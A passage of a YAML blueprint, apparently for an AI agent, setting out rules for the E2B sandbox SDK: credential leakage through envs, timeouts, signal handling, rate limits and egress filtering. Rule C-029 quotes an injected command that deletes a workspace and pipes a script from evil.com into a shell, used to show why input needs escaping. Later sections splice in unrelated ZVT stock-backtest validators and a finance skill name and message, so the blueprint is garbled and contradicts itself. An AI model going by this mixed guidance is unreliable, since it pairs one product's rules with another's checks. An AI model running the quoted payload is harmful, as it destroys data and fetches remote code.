      -l -c wrapper with no kernel state and no rich output. The Code Interpreter lives in the separate e2b-dev/code-interpreter
      repo (pip install e2b-code-interpreter / npm i @e2b/code-interpreter).
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Treating commands.run() as a Jupyter substitute means no cross-call variable retention, no image/HTML output,
      no kernel timeout control; the promised rich-output capability does not exist, and callers receive a stdout string instead
      of a structured result.
    stage_ids:
    - code_execution_separate_package
    derived_from_bd_id: pitfall-005
  - id: e2b-C-006
    when: Planning how to inject sensitive credentials (OPENAI_API_KEY, ANTHROPIC_API_KEY, *_TOKEN) into in-sandbox processes.
    action: Do NOT assume the SDK auto-redacts envs values matching *_API_KEY / *_TOKEN patterns — there is no warnings.warn
      or scrub function anywhere on the Sandbox.create(envs=...) path, and the entire envs dict lands verbatim in NewSandbox.env_vars.
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Putting credentials into envs triggers no warning or audit-log entry; the caller assumes the SDK has scrubbed
      them while the API key actually lands in the sandbox env and can be enumerated via commands.list(). The leak happens
      entirely silently.
    stage_ids:
    - sandbox_lifecycle
    derived_from_bd_id: BD-G01
  - id: e2b-C-007
    when: When the in-sandbox process truly needs access to credentials (the task cannot be done entirely outside the sandbox).
    action: 'Use an in-sandbox secret-fetch via one of three options: 1) mount a read-only secret volume via volume_mounts
      and read from file; 2) call a vault/secret-manager client inside the sandbox (e.g. aws-cli secretsmanager get-secret-value)
      at runtime; 3) ship a signed-encrypted blob via download_url and decrypt inside the sandbox. NEVER use envs={...}.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: When fetched any of these three ways, credentials never appear in NewSandbox.env_vars body, are not enumerable
      via commands.list(), and are not written to the envs field of any audit log — they exist only briefly in the in-sandbox
      process's runtime memory.
    stage_ids:
    - sandbox_lifecycle
    - filesystem_ops
    derived_from_bd_id: BD-G01-remedy
  - id: e2b-C-008
    when: Migrating to the TypeScript SDK with the Python `with Sandbox.create() as sbx:` mental model.
    action: Do NOT assume the TS Sandbox class supports `using sandbox = Sandbox.create()` for auto-kill — the TS class does
      not implement Symbol.dispose/Symbol.asyncDispose (grep packages/js-sdk returns empty), and the TypeScript 5.2+ `using`
      block has no effect on it.
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Migrating with the Python mental model leaves callers trusting `using` to auto-kill; without try/finally,
      leaks persist until the 5-minute default timeout reclaims them, and every uncaught exception or early return leaks a
      billable sandbox.
    derived_from_bd_id: BD-G02
  - id: e2b-C-009
    when: Writing TypeScript SDK code that must reclaim the sandbox even on exception paths.
    action: Wrap each Sandbox.create() in try/finally immediately, and `await sandbox.kill()` in the finally block — see packages/js-sdk/example.mts:6-11
      for the canonical pattern.
    severity: high
    kind: domain_rule
    modality: must
    consequence: With the try/finally pattern, sandbox.kill() runs in finally regardless of normal return or exception; the
      sandbox is deleted in milliseconds rather than waiting for the 5-minute default timeout, avoiding leaked billable time.
    derived_from_bd_id: BD-G02-remedy
  - id: e2b-C-010
    when: Evaluating files.write() / files.write_files() reliability for large files (> ~10MB) or slow networks.
    action: Do NOT assume the SDK auto-scales request_timeout based on payload size — the SDK reads the entire file into RAM
      inside to_upload_body() and issues the request with a uniform 60s REQUEST_TIMEOUT; there is no payload-size heuristic
      and no adaptive chunking.
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Files that take more than 60s to transfer are cut off by httpx at 60s; the SDK raises a generic ReadTimeout
      but ProcessInfo does not distinguish timeout from transport error, and callers misdiagnose this as a code bug and waste
      API quota retrying.
    stage_ids:
    - filesystem_ops
    derived_from_bd_id: BD-G03
  - id: e2b-C-011
    when: Transferring > ~10MB into a sandbox or transferring any file over a slow/unstable network.
    action: 'Choose one: 1) call sandbox.files.write(path, data, request_timeout=300) and explicitly raise the timeout (Python
      seconds / TS milliseconds, see csi-001); 2) switch to sandbox.upload_url(path, ...) and ship via signed-URL CDN transport.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: Both options bypass the default 60s cap. Signed-URL transport additionally avoids buffering the file in client
      RAM and supports resumable uploads.
    stage_ids:
    - filesystem_ops
    derived_from_bd_id: BD-G03-remedy
  - id: e2b-C-012
    when: When in-sandbox long-running services (HTTP server, DB writer, etc.) need to execute graceful-shutdown hooks.
    action: 'Do NOT assume sandbox.commands.kill(pid) sends SIGTERM — the SDK public commands.kill() hard-codes process_pb2.Signal.SIGNAL_SIGKILL
      at command.py:94, so the process gets no chance to run atexit, signal handlers, defer hooks, etc. (note: SIGTERM exists
      in process_pb2.pyi:18-23 wire protocol, the SDK simply does not surface it via kill()).'
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: After a forced commands.kill(), in-process unflushed DB transactions, uncommitted file handles, and undrained
      network connections are all lost; long-running services may leave behind dirty file locks, leftover sockets, and corrupted
      SQLite WAL.
    stage_ids:
    - process_management
    derived_from_bd_id: BD-G04
  - id: e2b-C-013
    when: When you really need to gracefully terminate an in-sandbox process and let it run cleanup hooks.
    action: 'Choose one: 1) call sandbox.commands.run(''pgrep -f <pattern>'') to get the PID, then sandbox.commands.run(f''kill
      -TERM {pid}'') to send SIGTERM inside the sandbox, wait a few seconds, and finally fall back to commands.kill() upgrading
      to SIGKILL; 2) call the underlying sandbox._rpc.send_signal(pid, SIGNAL_SIGTERM) directly (private API, may change in
      the future).'
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: After SIGTERM, the process can run atexit / signal handlers, flush DBs, close files, drop connections; if
      the process still survives after a SIGTERM grace period, the SIGKILL fallback ensures cleanup without leaving dirty
      state.
    stage_ids:
    - process_management
    derived_from_bd_id: BD-G04-remedy
  - id: e2b-C-014
    when: Implementing agent orchestration logic that spawns sandboxes concurrently (fan-out, batch evaluation, etc.).
    action: Do NOT assume the SDK auto-throttles or precomputes team quota — there is no client-side semaphore in the SDK
      and no exposed precheck API like GET /teams/{id}/quota; team_metric.concurrent_sandboxes is a monitoring metric only
      and cannot serve as a pre-create guard.
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: A burst of concurrent Sandbox.create() calls that exceeds the team's server-side quota gets 429 RateLimitException
      from the control plane and 429 SandboxException from envd (two distinct types), with no built-in retry/back-off; uncaught,
      the entire fan-out fails.
    stage_ids:
    - sandbox_lifecycle
    derived_from_bd_id: BD-G05
  - id: e2b-C-015
    when: Writing code that spawns sandboxes concurrently (≥ 2 parallel create calls).
    action: 'Self-implement client-side throttling: 1) cap concurrent Sandbox.create() with asyncio.Semaphore(N) or anyio
      CapacityLimiter; 2) wrap Sandbox.create() in try/except and catch BOTH RateLimitException and SandboxException (both
      429 types must be caught), retrying with exponential back-off (e.g. tenacity wait_exponential) on hits.'
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: After adding semaphore + dual-exception retry, concurrent creates queue up within quota and recover from
      transient 429s one by one, so the entire fan-out no longer fails wholesale on a transient throttle.
    stage_ids:
    - sandbox_lifecycle
    derived_from_bd_id: BD-G05-remedy
  - id: e2b-C-016
    when: Using Sandbox.create(mcp={...}) to launch the MCP gateway bridging to external MCP services.
    action: Do NOT assume that GATEWAY_ACCESS_TOKEN and other MCP credentials get auto-hidden by the SDK — MCP envs flow through
      the same raw passthrough path as ordinary envs, and once the gateway process starts, its envs are visible in commands.list()
      ProcessInfo (and the MCP gateway typically runs as root).
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Anyone holding the sandbox handle can call commands.list() and enumerate the MCP gateway process's full envs
      field — GATEWAY_ACCESS_TOKEN, GitHub PAT, Slack token and so on are all exposed, and root privilege amplifies the misuse
      blast radius.
    stage_ids:
    - sandbox_lifecycle
    - process_management
    derived_from_bd_id: BD-G06
  - id: e2b-C-017
    when: Using the MCP gateway to bridge an external service that requires an access token.
    action: 'Do NOT pass the token directly via mcp={...envs:{TOKEN:...}} — instead pick one of: 1) ship the token encrypted
      via download_url, the gateway start-up script decrypts inside the sandbox; 2) mount a read-only token file via volume_mounts,
      the gateway start-up script reads the file; 3) use a short-lived PAT (< 1h) so even a leak window stays minimal.'
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: With any of those approaches, the token never appears in NewSandbox.env_vars body, is not exposed by commands.list(),
      and only exists briefly in the gateway process's runtime memory.
    stage_ids:
    - sandbox_lifecycle
    derived_from_bd_id: BD-G06-remedy
  - id: e2b-C-018
    when: Porting Python SDK code 1:1 to the TypeScript SDK (or the reverse), where any timeout/request_timeout numeric parameters
      are involved.
    action: 'Translate the unit: Python timeout/request_timeout/REQUEST_TIMEOUT are seconds; TypeScript-equivalent fields
      are milliseconds. Multiply by 1000 going Py→TS; divide by 1000 going TS→Py.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: 'Skipping the unit conversion gives a 1000x error: a 60-second Python timeout becomes 60ms in TS (almost
      everything times out instantly) or a 60-second TS timeout becomes 60 000s in Py (virtually never times out and resources
      hang).'
    derived_from_bd_id: csi-001
  - id: e2b-C-019
    when: Writing TypeScript SDK Sandbox lifecycle-management code that must reclaim sandboxes on exception paths.
    action: Place try/finally around each Sandbox.create() and `await sandbox.kill()` in finally — refer to the canonical
      pattern at packages/js-sdk/example.mts:6-11; do NOT depend on `using` since Symbol.dispose/asyncDispose are not implemented.
    severity: high
    kind: domain_rule
    modality: must
    consequence: The try/finally pattern guarantees sandbox.kill() runs on every exit path, eliminating sandbox leakage caused
      by exceptions or early returns and bounding cost.
    derived_from_bd_id: csi-002
  - id: e2b-C-020
    when: Instantiating a Sandbox object (Python or TypeScript SDK).
    action: 'Use the static factory Sandbox.create() / AsyncSandbox.create(); do NOT call the constructor Sandbox(...) directly
      — the Python constructor is marked `:deprecated:` at sandbox_sync/main.py:97-101, and the TS surface guides callers
      via a static async create() factory plus JSDoc @access protected (note: JSDoc tags are documentation only — TSC does
      not block `new Sandbox()`, so this depends on developer discipline).'
    severity: high
    kind: domain_rule
    modality: must
    consequence: Direct constructor calls skip the envd connection bootstrap, access_token negotiation, and template resolution
      that .create() performs. The resulting Sandbox instance is missing critical runtime state, and any sub-module method
      call fails because the connection is not ready.
    derived_from_bd_id: csi-003
  - id: e2b-C-021
    when: Configuring environment variables or interpreting error messages for the SDK runtime and CLI tooling.
    action: Distinguish E2B_API_KEY (SDK runtime — Sandbox.create/kill/pause) from E2B_ACCESS_TOKEN (CLI — `e2b auth login`,
      template build, dashboard); the two have different uses and are not interchangeable. Optional E2B_DOMAIN defaults to
      'e2b.app'.
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Configuring E2B_ACCESS_TOKEN for the SDK makes every control-plane HTTP call return 401/403 and Sandbox.create
      fail, but the error message does not directly hint that the token type is wrong. Conversely, using an API key for the
      CLI makes `e2b auth login` fail.
    derived_from_bd_id: global_contract_auth
  - id: e2b-C-022
    when: Implementing error handling / retry logic for E2B SDK calls.
    action: Catch RateLimitException (control plane, api/__init__.py:54) AND SandboxException (envd plane, envd/api.py:23-24
      raises generic SandboxException for 429) at the same time — the two API planes raise different exception types for 429,
      and catching only one misses half the cases.
    severity: high
    kind: domain_rule
    modality: must
    consequence: Catching only RateLimitException misses envd 429s (raised as SandboxException) on commands.run, files.write,
      etc. The caller misclassifies it as a generic error and retries immediately, exacerbating the throttle.
    derived_from_bd_id: global_contract_429
  - id: e2b-C-023
    when: Planning the overall Sandbox lifetime and per-call durations for long-running tasks (> 60s).
    action: 'Tune all three timeout layers at once: 1) Sandbox.create(timeout=N) for sandbox lifetime (seconds, default 300,
      cap 24h Pro / 1h Hobby); 2) commands.run(cmd, timeout=N, request_timeout=N) for process-level and RPC-level timeouts;
      3) for large file uploads, raise files.write(..., request_timeout=N) separately. The three layers do NOT auto-coordinate.'
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Setting only sandbox-level timeout=3600 but forgetting commands.run(timeout=60) clips the long process at
      60s while the sandbox keeps running until its own timeout — wasted quota plus task interruption. Setting only process
      timeout but with sandbox timeout < process timeout has the sandbox KILLED before the process finishes.
    derived_from_bd_id: global_contract_timeouts
  - id: e2b-C-024
    when: Trying to subclass Sandbox / Filesystem / Commands / Pty / Git to extend behaviour.
    action: Do NOT assume the SDK defines extension points via Python @abstractmethod or TS abstract class — a whole-repo
      `grep -rn '@abstractmethod'` returns 0; the polymorphism boundary lives in envd's process_pb2 / filesystem_pb2 .proto
      schemas, and the SDK is a pure RPC client.
    severity: medium
    kind: architecture_guardrail
    modality: must_not
    consequence: If you write subclasses overriding record() / kill() etc. with an ABC mindset, the SDK calls RPC directly
      at runtime and never invokes your subclass code; every override is silently no-op. Real extension requires forking e2b-dev/infra
      and modifying the envd server side.
    derived_from_bd_id: global_contract_proto
  - id: e2b-C-025
    when: Introducing the e2b package's entry classes to a host AI.
    action: 'List all four top-level export classes: Sandbox (sync), AsyncSandbox (async), Template (sync), AsyncTemplate
      (async) — they form a 2x2 (sync/async) × (sandbox/template) matrix. Omitting AsyncTemplate strands users on the async
      path with the sync Template interface.'
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: When only Sandbox / AsyncSandbox / Template are introduced, users on AsyncSandbox are forced to fall back
      to the sync Template interface for template builds, either blocking the event loop or wrapping in to_thread() manually
      — breaking the async pipeline end-to-end.
    derived_from_bd_id: global_contract_2x2
  - id: e2b-C-027
    when: Implementing concurrent Sandbox.create() calls (fan-out > 1 parallel sandbox).
    action: Treat the team-level concurrent-sandbox quota as an external constraint and self-implement throttling — the SDK
      has no client-side semaphore, team_metric.concurrent_sandboxes is monitoring-only, and over-quota returns from the server
      arrive as either RateLimitException or SandboxException.
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Without client-side throttling, concurrent creates that exceed the team quota raise one of the two 429 exception
      types (depending on whether it hits the control plane or envd). Uncaught, the entire fan-out fails; partially caught,
      some sandboxes are already created but cannot be reclaimed.
    stage_ids:
    - sandbox_lifecycle
    derived_from_bd_id: BD-017
  - id: e2b-C-028
    when: Using download_url / upload_url signed-URL channels for file transfer.
    action: Keep Sandbox.create() default secure=True — envd requires the X-Access-Token header, and signed URLs are only
      valid when use_signature_expiration > 0. Explicitly setting secure=False makes envd reject every request.
    severity: high
    kind: resource_boundary
    modality: must
    consequence: secure=False makes envd refuse all calls and the entire in-sandbox communication chain breaks; signed URLs
      cannot be generated either (no envd_access_token).
    stage_ids:
    - sandbox_lifecycle
    - filesystem_ops
    derived_from_bd_id: BD-003
  - id: e2b-C-029
    when: Passing strings to sandbox.commands.run(cmd) that are concatenated from user/AI output (prompt fragments, file contents,
      external data).
    action: Escape every untrusted fragment with shlex.quote() (Python) or use child_process args arrays (JS) — NEVER plain
      string-concat. commands.run wraps cmd as ['/bin/bash', '-l', '-c', cmd] at command.py:252-254; the login shell honours
      &&, |, variable expansion, so unescaped fragments can inject arbitrary commands.
    severity: high
    kind: domain_rule
    modality: must
    consequence: Without escaping, an attacker can append `; rm -rf /workspace; curl evil.com | sh` at the end of user input
      and execute arbitrary commands inside the sandbox — leaking in-sandbox secrets, writing malicious files, and using the
      sandbox's outbound network for second-stage attacks.
    stage_ids:
    - process_management
    derived_from_bd_id: BD-007
  - id: e2b-C-030
    when: Calling Sandbox.connect(sandbox_id) on a latency-critical path (user-first request, < 1s SLA).
    action: Do NOT assume connect() is a side-effect-free lightweight reattach — connect transparently triggers a paused→running
      state transition at sandbox_api.py:285-321; if the sandbox is paused, connect pays the wake-up latency and the corresponding
      billing.
    severity: medium
    kind: architecture_guardrail
    modality: must_not
    consequence: The unanticipated wake-up latency (typically hundreds of milliseconds to seconds depending on sandbox image
      size) breaks the SLA and simultaneously triggers paused→running billing. For long-idle resources, repeated wake-ups
      can cost more than kill+create.
    stage_ids:
    - sandbox_lifecycle
    derived_from_bd_id: BD-019
  - id: e2b-C-031
    when: Choosing between pause() and _cls_create_snapshot() for sandbox state preservation.
    action: 'Pick precisely based on lifecycle need: 1) pause() preserves state only while the sandbox itself is alive (if
      the sandbox is killed, the paused state is lost too) — fits short hibernation between agent turns; 2) create_snapshot()
      returns an ID that can be reused via Sandbox.create(snapshot_id=...), independent of the original sandbox lifecycle
      — fits long-lived golden images.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: Treating pause as snapshot loses the paused state when the sandbox is killed, and the next attempt to recover
      finds connect() raising SandboxNotFoundException with no snapshot to fall back to. Treating snapshot as pause pays storage
      cost every time without using the reuse semantics.
    stage_ids:
    - sandbox_lifecycle
    derived_from_bd_id: BD-020
  - id: e2b-C-032
    when: Using Sandbox.create() for training / eval ML workloads that may run > 5 min.
    action: Pass an explicit timeout=N (seconds, sized as expected runtime + 30% buffer), or call sandbox.set_timeout(N) at
      runtime to extend; the default 300s assumes a typical agent task < 5 min, which is too short for long ML workloads.
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Without overriding the 300s default, the long task gets KILLed at 5 min and any training/eval progress is
      lost — restart from scratch is required. Repeated retries waste GPU/CPU time and quota.
    stage_ids:
    - sandbox_lifecycle
    derived_from_bd_id: BD-001
  - id: e2b-C-033
    when: Launching a sandbox for hostile-code, untrusted prompt source, regulated data processing, or other high-risk scenarios.
    action: 'Pass Sandbox.create() with allow_internet_access=False or network={''deny_out'': [ALL_TRAFFIC], ''allow_out'':
      [trusted_cidr...]} explicitly — the default allow_internet_access=True lets the sandbox reach the open internet, conflicting
      with the ''sandboxed'' security intuition.'
    severity: high
    kind: operational_lesson
    modality: should
    consequence: With default open egress, in-sandbox AI-generated code or prompt-injected commands can fetch arbitrary malicious
      payloads, exfiltrate data to attacker-controlled endpoints, and use the sandbox as a second-stage jump host.
    stage_ids:
    - network_port_forwarding
    derived_from_bd_id: BD-004
  - id: e2b-C-034
    when: Using sandbox.commands.run() to launch long-running processes (HTTP server, streaming daemon, training process,
      etc.).
    action: Set background=True, timeout=0 — commands.run defaults to timeout=60 seconds and the SDK actively terminates the
      process when it expires; timeout=0 means no limit, and background=True frees the caller from blocking.
    severity: high
    kind: domain_rule
    modality: must
    consequence: Without timeout=0, long processes are terminated by process timeout at 60s — the web server suddenly goes
      offline, training jobs are interrupted, stream processors lose data.
    stage_ids:
    - process_management
    derived_from_bd_id: BD-005
  - id: e2b-C-035
    when: Passing git credentials (PAT, password) to sandbox.git.clone(url, username, password).
    action: Do NOT pass long-lived credentials via the username/password parameters — with_credentials() splices them into
      the URL netloc, and the git subprocess's argv shows up in `ps` and commands.list(). Prefer SSH keys + ssh-agent, or
      short-lived PATs (< 1h, scope narrowed to the target repo).
    severity: medium
    kind: operational_lesson
    modality: should_not
    consequence: Long-lived credentials end up in the in-sandbox `ps -e` output and the args field of commands.list(); anyone
      holding the sandbox handle can read them, and a leak grants full repo access for the credential's lifetime.
    stage_ids:
    - git
    derived_from_bd_id: BD-010
  - id: e2b-C-036
    when: Discovering files.write_files() under-performs and upload bandwidth utilization is low.
    action: Use the e2b CLI to rebuild the sandbox template against a newer envd that supports ENVD_OCTET_STREAM_UPLOAD —
      older envd falls back to multipart with worse performance; the SDK auto-detects envd version via use_octet_stream =
      self._envd_version >= ENVD_OCTET_STREAM_UPLOAD.
    severity: low
    kind: operational_lesson
    modality: should
    consequence: Sandboxes built on older envd templates use multipart upload, which adds boundary, serialization and parsing
      overhead vs octet-stream — large-file or batch-small-file scenarios see noticeable throughput degradation.
    stage_ids:
    - filesystem_ops
    derived_from_bd_id: BD-013
  - id: e2b-C-037
    when: Using sandbox.files.watch_dir(path, recursive=True) to listen for subdirectory changes.
    action: First confirm the envd template is upgraded to a version after ENVD_VERSION_RECURSIVE_WATCH — calling recursive=True
      against an older envd raises TemplateException rather than gracefully degrading.
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: On un-upgraded envd, watch_dir(recursive=True) raises TemplateException, the entire watch flow fails, and
      file events are missed; if the exception is uncaught, the agent pipeline halts.
    stage_ids:
    - filesystem_ops
    derived_from_bd_id: BD-014
  - id: e2b-C-038
    when: Using Sandbox.create(mcp={...}) and also wanting the sandbox to use a custom template.
    action: Explicitly pass both template='<my_template>' and mcp={...} — when mcp is set, the SDK auto-switches template
      to 'mcp-gateway' at main.py:202-205, so without an explicit template you override your own intent.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: The caller expects the sandbox to run on their own custom-built template (with pre-installed deps, custom
      scripts) but it actually runs on the default 'mcp-gateway' template; the missing pre-installed environment causes subsequent
      commands.run() to fail to find tools or paths.
    stage_ids:
    - sandbox_lifecycle
    derived_from_bd_id: BD-015
  - id: e2b-C-039
    when: Configuring sandbox egress filtering in 'block all but X' mode.
    action: Set BOTH deny_out=[ALL_TRAFFIC] AND allow_out=[trusted_ip_or_cidr] together — allow rules take priority over deny
      rules (verified by test_allow_takes_precedence_over_deny); setting allow_out alone does NOT block other egress.
    severity: high
    kind: domain_rule
    modality: must
    consequence: Setting only allow_out without an explicit global deny leaves the sandbox able to reach everything outside
      allow_out — the 'whitelist' is effectively a no-op (allow precedence lets other traffic through under default-allow).
    stage_ids:
    - network_port_forwarding
  - id: e2b-C-040
    when: Using allow_public_traffic=False for private service hosting (only authorized parties can access sandbox-exposed
      ports).
    action: Every HTTP request hitting a URL returned by sandbox.get_host(port) MUST carry the e2b-traffic-access-token header
      — otherwise the E2B routing layer refuses to forward.
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Forgetting the e2b-traffic-access-token header makes every request to the private sandbox port get dropped
      at the routing layer, returning a 401/403-like status instead of reaching the in-sandbox server; the caller misdiagnoses
      it as 'server not started'.
    stage_ids:
    - network_port_forwarding
  - id: e2b-C-041
    when: Using sandbox.files.watch_dir(path) to listen for file events.
    action: Call WatchHandle.stop() on both success and error paths — without stop, the watcher keeps running inside the sandbox
      until the sandbox terminates; repeated watches against the same path accumulate RPC overhead.
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Un-stopped WatchHandles keep RPC connections alive in the sandbox; repeated watches on the same directory
      accumulate subscribers, every filesystem event is processed multiple times, and CPU + bandwidth degrade linearly.
    stage_ids:
    - filesystem_ops
  - id: e2b-C-042
    when: Generating signed URLs for browser/CDN direct file transfer via sandbox.download_url or sandbox.upload_url with
      use_signature_expiration.
    action: Pass use_signature_expiration > 0 (seconds) — passing 0 or a negative value yields an immediately-expired URL
      that downstream consumers cannot use even when received.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: When use_signature_expiration <= 0, the signed URL is already expired the moment it is generated; the browser/CDN
      call returns 403/Forbidden immediately, and the caller cannot distinguish whether the issue is signing or a missing
      file.
    stage_ids:
    - filesystem_ops
output_validator:
  assertions:
  - id: OV-01
    check_predicate: all(p in inspect.getsource(zvt.factors.algorithm.macd) for p in ['slow=26', 'fast=12', 'n=9'])
    failure_message: 'FATAL: MACD params drifted from (fast=12, slow=26, n=9) — SL-08 violation, non-reproducible signals'
    business_meaning: Standard MACD parameters are a semantic lock; drift makes results incomparable with industry-standard
      indicators and non-reproducible.
    source_ids:
    - SL-08
    - BD-036
  - id: OV-02
    check_predicate: result.get('total_trades', 0) > 0 or result.get('explicit_zero_trade_ack') is True
    failure_message: Zero trades executed — likely missing pre-fetched data (see PC-02) or over-restrictive filters
    business_meaning: A backtest with zero trades is not a valid result; either data is missing or the strategy never triggered.
      Structural non-emptiness check is insufficient — we need business confirmation.
    source_ids:
    - SL-01
    - finance-C-073
  - id: OV-03
    check_predicate: result.get('annual_return') is None or abs(float(result['annual_return'])) <= 5.0
    failure_message: 'FATAL: |annual_return| > 500% — likely look-ahead bias or data error'
    business_meaning: Annual returns exceeding 500% are physically implausible for A-share strategies; indicates look-ahead
      bias or corrupt data.
    source_ids: []
  - id: OV-04
    check_predicate: result.get('holding_change_pct') is None or abs(float(result['holding_change_pct'])) <= 1.0
    failure_message: 'FATAL: |holding_change_pct| > 100% — physically impossible'
    business_meaning: Holding change percentage cannot exceed 100%; violation indicates position accounting error.
    source_ids:
    - BD-029
  - id: OV-05
    check_predicate: result.get('max_drawdown') is None or abs(float(result['max_drawdown'])) <= 1.0
    failure_message: 'FATAL: |max_drawdown| > 100% — impossible for non-leveraged account'
    business_meaning: Maximum drawdown cannot exceed 100% without leverage; violation indicates calculation error or look-ahead
      bias.
    source_ids: []
  - id: OV-06
    check_predicate: not (hasattr(result, 'trade_log') and result.trade_log and any(result.trade_log[i].action == 'sell' and
      i+1 < len(result.trade_log) and result.trade_log[i+1].action == 'buy' and result.trade_log[i].timestamp == result.trade_log[i+1].timestamp
      for i in range(len(result.trade_log)-1)))
    failure_message: 'FATAL: buy-before-sell detected in same cycle — SL-01 violation, creates implicit leverage'
    business_meaning: SL-01 requires sell() before buy() in each cycle; violation means available_long was not updated before
      buying, risking duplicate positions.
    source_ids:
    - SL-01
  scaffold:
    validate_py_path: '{workspace}/validate.py'
    tail_block: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()\n    from\
      \ validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\")\n# ===\
      \ END DO NOT MODIFY ==="
  enforcement_protocol: 1. Never edit validate.py. 2. Never delete the DO NOT MODIFY tail block from the main script. 3. Never
    wrap enforce_validation() in try/except. 4. Never rewrite result write logic — it MUST go through enforce_validation.
    5. If validate.py raises ImportError, fix the dependency, do not remove the call.
acceptance:
  hard_gates:
  - id: G1
    check: '{workspace}/result.csv exists AND file size > 0'
    on_fail: Strategy did not produce output; check run_backtest() return value and enforce_validation() call
  - id: G2
    check: '{workspace}/result.csv.validation_passed marker file exists'
    on_fail: Validation did not complete; review validate.py output and fix assertion failures
  - id: G3
    check: 'Main script contains literal: from validate import enforce_validation'
    on_fail: Validation chain stripped; re-add the import in the DO NOT MODIFY block
  - id: G4
    check: 'Main script contains literal: # === DO NOT MODIFY BELOW THIS LINE ==='
    on_fail: Validation fence removed; regenerate DO NOT MODIFY tail block
  - id: G5
    check: 'result.csv has at least 1 row: pandas.read_csv(result.csv).shape[0] >= 1'
    on_fail: Empty result; check if trade_log is non-empty and factors generated signals. Confirm PC-02 (k-data exists) passed.
  - id: G6
    check: 'If MACD strategy: source contains ''slow=26'' AND ''fast=12'' AND ''n=9'' in algorithm call'
    on_fail: MACD params drifted from SL-08 lock; restore standard (12, 26, 9)
  - id: G7
    check: 'For data pipeline tasks: result.csv contains ''entity_id'' and ''timestamp'' fields'
    on_fail: Missing required columns; check Mixin.query_data return schema and DataFrame MultiIndex reset_index() before
      writing
  - id: G8
    check: 'OV-03 passes: abs(annual_return) <= 5.0 (500%)'
    on_fail: Physical plausibility check failed; investigate look-ahead bias or data corruption in input kdata
  soft_gates:
  - id: SG-01
    rubric: 'Strategy narrative consistency: user intent aligns with generated strategy.py logic. dim_a: signal direction
      (buy/sell) matches intent [1-5, pass>=4]; dim_b: frequency (daily/intraday) aligns [1-5, pass>=4]; dim_c: risk controls
      match user intent [1-5, pass>=4].'
  - id: SG-02
    rubric: 'Factor combination quality. dim_a: no highly correlated factor duplication [1-5, pass>=4]; dim_b: multi-period
      alignment correct [1-5, pass>=4]; dim_c: liquidity filter present for A-share [1-5, pass>=4].'
  - id: SG-03
    rubric: 'Data source selection appropriateness. dim_a: coverage sufficient for target entities [1-5, pass>=4]; dim_b:
      provider latency acceptable for strategy frequency [1-5, pass>=4]; dim_c: no unauthorized provider used without credentials
      [1-5, pass>=4].'
skill_crystallization:
  trigger: all_hard_gates_passed AND user_opt_out_skill_saving != true
  output_path_template: '{workspace}/../skills/{slug}.skill'
  slug_template: '{blueprint_id_short}-{uc_id_lower}'
  captured_fields:
  - name
  - intent_keywords
  - entry_point_script
  - validate_script
  - fatal_constraints
  - spec_locks
  - preconditions
  - install_recipes
  - human_summary_translated
  action: 'After all Hard Gates PASS, resolve slug via slug_template using the executed UC, then write the .skill YAML file
    at output_path_template. Notify user in their detected locale: ''Skill saved as {slug}.skill — next time say one of {sample_triggers}
    from the matched UC to invoke directly.'''
  violation_signal: All hard gates passed but no .skill file exists at expected path
  skill_file_schema:
    name: finance-bp-141 / Run a one-off shell command and capture output
    version: v6.1
    intent_keywords:
    - run
    - exec
    - shell
    - command
    - stdout
    entry_point: run_backtest
    fatal_guards:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-10
    - SL-11
    - SL-12
    spec_locks:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-09
    - SL-10
    - SL-11
    - SL-12
    preconditions:
    - PC-01
    - PC-02
    - PC-03
    - PC-04
post_install_notice:
  trigger: skill_installation_complete
  message_template:
    positioning: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow.
    capability_catalog:
      group_strategy:
        source: auto_grouped
        strategy_reason: auto-grouped by UC.type (2 distinct values, balanced distribution)
      groups:
      - group_id: complete_strategy
        name: Complete Strategy
        description: ''
        emoji: 📦
        uc_count: 8
        ucs:
        - uc_id: UC-001
          name: Run a one-off shell command and capture output
          short_description: Execute AI-generated code/shell snippet and read stdout/exit_code synchronously
          sample_triggers:
          - run
          - exec
          - shell
        - uc_id: UC-002
          name: Long-running background server with port exposure
          short_description: Start an HTTP server inside the sandbox and serve traffic to outside callers via the public hostname
          sample_triggers:
          - server
          - port
          - host
        - uc_id: UC-003
          name: File upload, edit, and watch for filesystem events
          short_description: Push a file into the sandbox, then react when it (or sibling files) change via WatchHandle callbacks
          sample_triggers:
          - watch
          - filesystem
          - events
        - uc_id: UC-004
          name: Egress firewalling via deny/allow lists
          short_description: Restrict sandbox network egress to specific IPs (defense-in-depth for prompt-injection / hostile-code
            scenarios)
          sample_triggers:
          - network
          - firewall
          - deny_out
        - uc_id: UC-005
          name: Pause and resume to preserve filesystem + RAM across reconnects
          short_description: Hibernate a sandbox between agent turns; resume later with full state intact (filesystem + RAM)
          sample_triggers:
          - pause
          - resume
          - connect
        - uc_id: UC-006
          name: Auto-pause on timeout with auto-resume on first request
